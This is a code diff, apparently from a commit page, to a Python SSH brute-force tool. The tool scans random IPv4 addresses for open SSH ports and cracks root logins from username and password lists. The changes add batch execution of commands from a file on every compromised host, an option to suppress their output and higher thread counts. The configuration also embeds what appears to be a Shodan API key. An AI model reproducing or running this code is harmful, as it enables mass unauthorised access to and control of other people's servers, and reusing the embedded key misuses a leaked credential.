9898
9999 -r <num> - generate <num> random ipv4 addresses, check for open
100100 sshd port and crack for login (only with -m option!)
101- -c <cmd> - execute this <cmd> on host if login was cracked
101+ -c <file|cmd> - read commands from file (line by line) or execute a
102+ single command on host if login was cracked
103+ -N - do not output ssh command results
102104 -u <user> - single username (default: root)
103105 -U <file> - list of usernames
104106 -p - single password (default: root)
105107 -P <file> - list of passwords
106108 -C <file> - list of user:pass combination
107- -x <num> - num threads for parallel host crack (default: 20 )
108- -S <num> - num threads for parallel service crack (default: 20 )
109- -X <num> - num threads for parallel login crack (default: 20 )
109+ -x <num> - num threads for parallel host crack (default: 50 )
110+ -S <num> - num threads for parallel service crack (default: 1 )
111+ -X <num> - num threads for parallel login crack (default: 5 )
110112 -B <num> - num threads for parallel banner grabbing (default: 70)
111113 -T <sec> - num sec for auth and connect timeout (default: 5s)
112114 -R <sec> - num sec for (banner) read timeout (default: 3s)
154156 'sho_lim' : None ,
155157 'sho_key' : 'Pp1oDSiavzKQJSsRgdzuxFJs8PQXzBL9' ,
156158 'cmd' : None ,
159+ 'cmd_no_out' : False ,
157160 'user' : 'root' ,
158161 'pass' : 'root' ,
159- 'hthreads' : 20 ,
160- 'sthreads' : 20 ,
161- 'lthreads' : 20 ,
162+ 'hthreads' : 50 ,
163+ 'sthreads' : 1 ,
164+ 'lthreads' : 5 ,
162165 'bthreads' : 70 ,
163166 'ctimeout' : 5 ,
164167 'rtimeout' : 3 ,
@@ -223,7 +226,7 @@ def parse_cmdline(cmdline):
223226
224227 try :
225228 _opts , _args = getopt .getopt (cmdline ,
226- 'h:l:m:s:b:r:c:u:U:p:P:C:x:S:X:B:T:R:o:evVH' )
229+ 'h:l:m:s:b:r:c:N: u:U:p:P:C:x:S:X:B:T:R:o:evVH' )
227230 for o , a in _opts :
228231 if o == '-h' :
229232 opts ['targets' ] = parse_target (a )
@@ -239,6 +242,8 @@ def parse_cmdline(cmdline):
239242 opts ['random' ] = int (a )
240243 if o == '-c' :
241244 opts ['cmd' ] = a
245+ if o == '-N' :
246+ opts ['cmd_no_out' ] = True
242247 if o == '-u' :
243248 opts ['user' ] = a
244249 if o == '-U' :
@@ -405,11 +410,25 @@ def crack_login(host, port, username, password):
405410 else :
406411 log (f'found a login (check { opts ["logfile" ]} , _type = 'good' )
407412 if opts ['cmd' ]:
408- log ('sending your ssh command' , 'info' )
409- stdin , stdout , stderr = cli .exec_command (opts ['cmd' ], timeout = 2 )
410- log ('ssh command results' , 'good' )
411- for line in stdout .readlines ():
412- log (line )
413+ if os .path .isfile (opts ['cmd' ]):
414+ log (f"sending ssh commands from { opts ['cmd' ]} , 'info' )
415+ with open (opts ['cmd' ], 'r' , encoding = 'latin-1' ) as _file :
416+ for line in _file :
417+ stdin , stdout , stderr = cli .exec_command (line , timeout = 2 )
418+ if not opts ['cmd_no_out' ]:
419+ rl = stdout .readlines ()
420+ if len (rl ) > 0 :
421+ log (f'ssh command result for: \' { line .rstrip ()} \' ' , 'good' ,
422+ pre_esc = '\n ' )
423+ for line in rl :
424+ log (f'{ line } )
425+ else :
426+ log ('sending your single ssh command line' , 'info' )
427+ if not opts ['cmd_no_out' ]:
428+ stdin , stdout , stderr = cli .exec_command (opts ['cmd' ], timeout = 2 )
429+ log (f"ssh command results for \' { opts ['cmd' ].rstrip ()} \' " , 'good' )
430+ for line in stdout .readlines ():
431+ log (line )
413432 return SUCCESS
414433 except paramiko .AuthenticationException as err :
415434 if opts ['verbose' ]:
@@ -463,6 +482,7 @@ def run_threads(host, ports, val='single'):
463482
464483 if 'userlist' in opts and 'passlist' in opts :
465484 for u in uf :
485+ pf = open (opts ['passlist' ], 'r' , encoding = 'latin-1' )
466486 for p in pf :
467487 exe .submit (crack_login , host , port , u .rstrip (), p .rstrip ())
468488
0 commit comments